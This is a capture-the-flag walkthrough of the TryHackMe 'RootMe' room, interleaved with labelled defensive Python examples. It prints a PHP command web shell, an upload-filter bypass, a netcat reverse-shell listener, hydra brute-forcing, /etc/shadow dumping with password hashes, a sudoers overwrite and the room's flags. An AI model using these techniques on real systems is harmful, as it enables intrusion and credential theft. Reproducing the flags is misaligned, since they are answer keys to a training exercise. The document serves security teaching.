https://tryhackme.com/room/rrootme
ROOTME WRITEUP

By Jacvbtaylor
Used OpenVPN and Kali Linux
completed August 30, 2022
Step 1:
nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt
This one-liner scans the host (or subnets, if given), writes the IP(s) that responded and are up into a text file, and then has Nmap scan those live hosts and append the results to a second text file. (It is most useful when scanning a whole network as opposed to a single machine, but I still like to use it.)
Once I have established a good baseline of what is running and open on the target, I start another scan to look for vulnerabilities on that machine while I check out the rest of the open ports.
nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt
In this case, ports 22 and 80 are open. There is a web page at 10.10.52.28, but nothing to interact with on the index page.
Step 2:
I tried running a directory brute-force using dirb, with no luck. I stopped it after about 10 minutes and switched to this
gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt
which produced a much faster and successful result. With this, I can gravitate toward the status 301 results.
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/css (Status: 301) [Size: 308] [--> http://10.10.52.28/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 307] [--> http://10.10.52.28/js/]
/panel (Status: 301) [Size: 310] [--> http://10.10.52.28/panel/]
/server-status (Status: 403) [Size: 276]
/uploads (Status: 301) [Size: 312] [--> http://10.10.52.28/uploads/]
Browsing to http://10.10.52.28/panel/ brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to http://10.10.52.28/uploads, which showed me an index of the files in that folder.
Step 3:
This has a lot of potential, but while I worked on exploiting it, I ran a brute-force against the SSH port in case I could discover an existing username and password.
hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
While this runs in the background, I began to think of the kind of files I can upload.
I started by creating a PHP file called cmd.php.
<?php
$command = $_GET['cmd'];
echo system($command);
?>
Step 4:
The server responded with a message saying PHP is prohibited.
I uploaded the same file but with the name cmd.php.jpg, and this uploaded successfully. I am unable to execute the code with that extension, so my next step is to figure out whether there are other valid extensions that will allow PHP to run.
I changed the name to cmd.phtml, uploaded, visited the url http://10.10.52.28/uploads/cmd.phtml and was greeted with a blank page.
It worked! Next step is to test commands. (Each result shows its last line twice because the script both runs system(), which prints the command output, and echoes system()'s return value, which is the output's last line.)
http://10.10.52.28/uploads/cmd.phtml?cmd=ls
cmd.php.jpg cmd.phtml eth0.txt eth0.txt
http://10.10.52.28/uploads/cmd.phtml?cmd=whoami
www-data www-data
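The bypass above works because the panel only blocks names ending in ".php". As an added example (not the room's or the author's code), here is that blocklist check beside the allowlist check a defender would use; the allowed image extensions are an assumption for this example, since the room never states its own list.

```python
import os.path

# Extensions an image-upload panel should accept. An assumption for this
# example; the room's panel never states its own allowlist.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def weak_check(filename):
    """The kind of blocklist the room's panel evidently used: a name is
    rejected only if it ends in ".php". cmd.phtml and cmd.php.jpg both pass."""
    return not filename.lower().endswith(".php")


def strict_check(filename):
    """Allowlist check: one extension only, and it must be on the allowlist.
    Dotfiles and double extensions (cmd.php.jpg) are rejected outright, so a
    permissive handler mapping such as Apache's AddHandler cannot be abused."""
    base = os.path.basename(filename)      # ignore any path the client sends
    if base.startswith(".") or base.count(".") != 1:
        return False
    stem, ext = os.path.splitext(base.lower())
    return bool(stem) and ext in ALLOWED_EXTENSIONS


def compare(filenames):
    """Map each upload name to (blocklist_accepts, allowlist_accepts)."""
    return {name: (weak_check(name), strict_check(name)) for name in filenames}


if __name__ == "__main__":
    names = ["cmd.php", "cmd.php.jpg", "cmd.phtml", "photo.jpg"]
    for name, (weak, strict) in compare(names).items():
        print(f"{name:12} blocklist={'accept' if weak else 'reject'}  "
              f"allowlist={'accept' if strict else 'reject'}")
```

The allowlist alone is not enough: the upload directory should also be served with script execution disabled (for example `php_admin_flag engine off` in the Apache directory block), so a file that slips through is never handed to the interpreter.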
Step 5:
Next step is to try and run some more involved commands. I first URL-encoded cd ../../../ && ls
http://10.10.52.28/uploads/cmd.phtml?cmd=cd ..%2F..%2F..%2F %26%26 ls
backups cache crash lib local lock log mail opt run snap spool tmp www www
http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin test:x:1001:1001:,,,:/home/test:/bin/bash test:x:1001:1001:,,,:/home/test:/bin/bash
This was a lot of info, so to simplify, I ran
http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd | awk -F "%3A" '{print%241}'
root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate rootme sshd test test
Step 6:
This outputs all of the users on the server. This may come in handy for the SSH brute-force, but we may still be able to exploit the server further through this file upload. Maybe a PHP reverse shell?
Before trying that, I stopped my SSH brute-force and changed the command to use a valid username.
hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
Again, I am going to let this run while I explore more options.
The last thing I wanted to try with the URL commands was to find out who the sudo users are.
http://10.10.52.28/uploads/cmd.phtml?cmd=getent group | grep sudo
sudo:x:27:rootme sudo:x:27:rootme
Step 7:
Now to create a reverse shell. I made a new .phtml file containing Pentest Monkey's PHP reverse shell, uploaded it to the site from the panel page, and then ran this on my attacking machine before requesting the file from the browser
ufw allow from 10.10.52.28 proto tcp to any port 4334 && nc -lnvp 4334
It worked!
listening on [any] 4334 ...
connect to [10.2.12.19] from (UNKNOWN) [10.10.52.28] 52082
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 21:33:01 up  1:41,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Step 8:
Now comes the hard part. This is my first time being stuck as the www-data user. We have no sudo privileges. After some research, I came across the possibility of an SUID escalation. To see the files with the SUID bit set, I ran this:
$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
Using the list output from the last command, I cross-referenced it with the list here: https://gtfobins.github.io/#+suid . To make it a little easier to cross-reference, I spent way too long sorting the information; this pipeline reduces the listing to the binary names, deduplicated and in alphabetical order
find / -perm -u=s -type f 2>/dev/null | awk -F "/" '{print $NF}' | sort -u
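A defender's version of the cross-reference above, as an added example (not the author's pipeline): it collapses the find listing to unique binary names, ignores the snap core images that duplicate the host's own SUID set, and reports anything not on a baseline. The baseline is an assumption built for this example from the stock entries in the listing; a real audit would take it from a clean reference image or package manifest.

```python
import os.path

# Subset of the `find / -perm -u=s -type f` output shown above (constructed
# sample for this example; the full listing has more of the same entries).
SUID_FIND_OUTPUT = """\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/usr/bin/sudo
/snap/core/9665/usr/bin/sudo
/bin/mount
/bin/su
/bin/ping
/bin/umount
"""

# Assumed baseline of SUID binaries a stock Ubuntu 18.04 host is expected to
# carry (built from the stock entries above, not from a reference image).
EXPECTED_SUID = {
    "dbus-daemon-launch-helper", "ssh-keysign", "at", "chfn", "gpasswd",
    "sudo", "passwd", "pkexec", "mount", "su", "ping", "umount",
}


def suid_basenames(find_output):
    """Sorted unique binary names, skipping the /snap/core/* images, which
    mirror the host's own SUID set and only add noise to the review."""
    names = set()
    for line in find_output.splitlines():
        path = line.strip()
        if path and not path.startswith("/snap/"):
            names.add(os.path.basename(path))
    return sorted(names)


def unexpected_suid(find_output, baseline=EXPECTED_SUID):
    """Names present on the host but not in the baseline: the short list an
    auditor (or a GTFOBins lookup) should actually spend time on."""
    return [name for name in suid_basenames(find_output) if name not in baseline]


if __name__ == "__main__":
    print("unexpected SUID binaries:", unexpected_suid(SUID_FIND_OUTPUT))
```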
Step 9:
Python seems to be the only match on that list that has the SUID bit set. I loaded a shell using Python.
$ whoami
www-data
$ su rootme
su: must be run from a terminal
$ python -c 'import os; os.system("/bin/sh")'
Same outcome as the reverse PHP shell. Still stuck as the www user for now.
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su
su: must be run from a terminal
$ su rootme
su: must be run from a terminal
Step 10:
Referencing https://rastating.github.io/privilege-escalation-via-python-library-hijacking/, it seems there may be a possibility of hijacking a library. This seems promising, but only if we discover a cron job run by root, or a file or folder in the Python library path that we can write to.
python -c 'import sys; print "\n".join(sys.path)'
/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages
After trying what felt like everything, I was finally able to read the shadow file using this Python one-liner
python -c 'print(open("/etc/shadow").read())'
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7::: daemon::18295:0:99999:7::: bin::18295:0:99999:7::: sys::18295:0:99999:7::: sync::18295:0:99999:7::: games::18295:0:99999:7::: man::18295:0:99999:7::: lp::18295:0:99999:7::: mail::18295:0:99999:7::: news::18295:0:99999:7::: uucp::18295:0:99999:7::: proxy::18295:0:99999:7::: www-data::18295:0:99999:7::: backup::18295:0:99999:7::: list::18295:0:99999:7::: irc::18295:0:99999:7::: gnats::18295:0:99999:7::: nobody::18295:0:99999:7::: systemd-network::18295:0:99999:7::: systemd-resolve::18295:0:99999:7::: syslog::18295:0:99999:7::: messagebus::18295:0:99999:7::: _apt::18295:0:99999:7::: lxd::18295:0:99999:7::: uuidd::18295:0:99999:7::: dnsmasq::18295:0:99999:7::: landscape::18295:0:99999:7::: pollinate::18295:0:99999:7::: rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7::: sshd::18478:0:99999:7::: test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::
Step 11:
python -c 'print(open("/etc/shadow").read())' | awk -F ":" 'NF {print$1,$2}' | sed -n '/[*!]/!p' > hashes
ls
hashes
cat hashes
root $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
sed 's/ /:/g' hashes > userhash
cat userhash
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
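The awk/sed pipeline above, as an added Python equivalent (not the room's or the author's code): it parses /etc/shadow-format lines, drops accounts whose hash field is empty, "*" or "!"-prefixed (no usable password), and labels the remaining hashes by their crypt(3) prefix so an auditor can see which accounts actually carry a password and of what strength class. The sample input is constructed with placeholder hash strings, not the room's hashes.

```python
# Constructed sample in /etc/shadow format. Field 2 is the password hash; an
# empty field, "*" or a leading "!" means the account has no usable password.
# The hash strings are made-up placeholders, not the room's real hashes.
SAMPLE_SHADOW = """\
root:$6$SALTaaaa$PLACEHOLDERHASHroot:18478:0:99999:7:::
daemon:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
lxd:!:18295:0:99999:7:::
backup:!$6$SALTlock$PLACEHOLDERlocked:18295:0:99999:7:::
rootme:$6$SALTbbbb$PLACEHOLDERHASHrootme:18478:0:99999:7:::
sshd:*:18478:0:99999:7:::
test:$6$SALTcccc$PLACEHOLDERHASHtest:18478:0:99999:7:::
"""

# crypt(3) prefix -> algorithm, so the report says what class of hash it is.
HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$y$": "yescrypt"}


def parse_shadow(text):
    """Yield (user, hash_field) for every well-formed line; skip blank lines."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            yield fields[0], fields[1]


def has_usable_password(hash_field):
    """False for "", "*", "!", "!!" and "!"-locked hashes such as "!$6$...".
    These are exactly the entries the sed filter above is meant to drop."""
    return hash_field != "" and not hash_field.startswith(("*", "!"))


def password_accounts(text):
    """Accounts that carry a real hash, as (user, algorithm, hash) tuples."""
    report = []
    for user, hash_field in parse_shadow(text):
        if has_usable_password(hash_field):
            algo = HASH_TYPES.get(hash_field[:3], "unknown")
            report.append((user, algo, hash_field))
    return report


if __name__ == "__main__":
    for user, algo, hash_field in password_accounts(SAMPLE_SHADOW):
        print(f"{user}:{hash_field}  [{algo}]")
```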
I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using John the Ripper to crack any of the 3 password hashes I collected, but still no luck.
Step 12:
I thought back to what I had done to even get that information in the first place. I used Python to open a file; what's stopping me from writing to one?
python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")'
sudo -i
mesg: ttyname failed: Inappropriate ioctl for device
su
whoami
root
passwd www-data
Enter new UNIX password: test
Retype new UNIX password: test
passwd: password updated successfully
I finally moved up a user! The PHP shell we are still operating from is limited to certain commands, so I wanted to try my best to get an SSH login with my www user, but kept getting kicked out after logging in.
┌──(root㉿kali)-[/home/kali/rootme]
└─# ssh www-data@10.10.52.28 -p 22
www-data@10.10.52.28's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
System information as of Wed Aug 31 00:06:05 UTC 2022
System load: 0.11    Processes: 115
Usage of /: 20.5% of 19.56GB    Users logged in: 0
Memory usage: 44%    IP address for eth0: 10.10.52.28
Swap usage: 0%
Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19
This account is currently not available.
Connection to 10.10.52.28 closed.
┌──(root㉿kali)-[/home/kali/rootme]
└─#
Step 13:
Oh well. Going back to the PHP shell, I located the user.txt file in /var/www
THM{y0u_g0t_a_sh3ll}
Lastly, I needed to locate the root.txt file
pwd
/root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}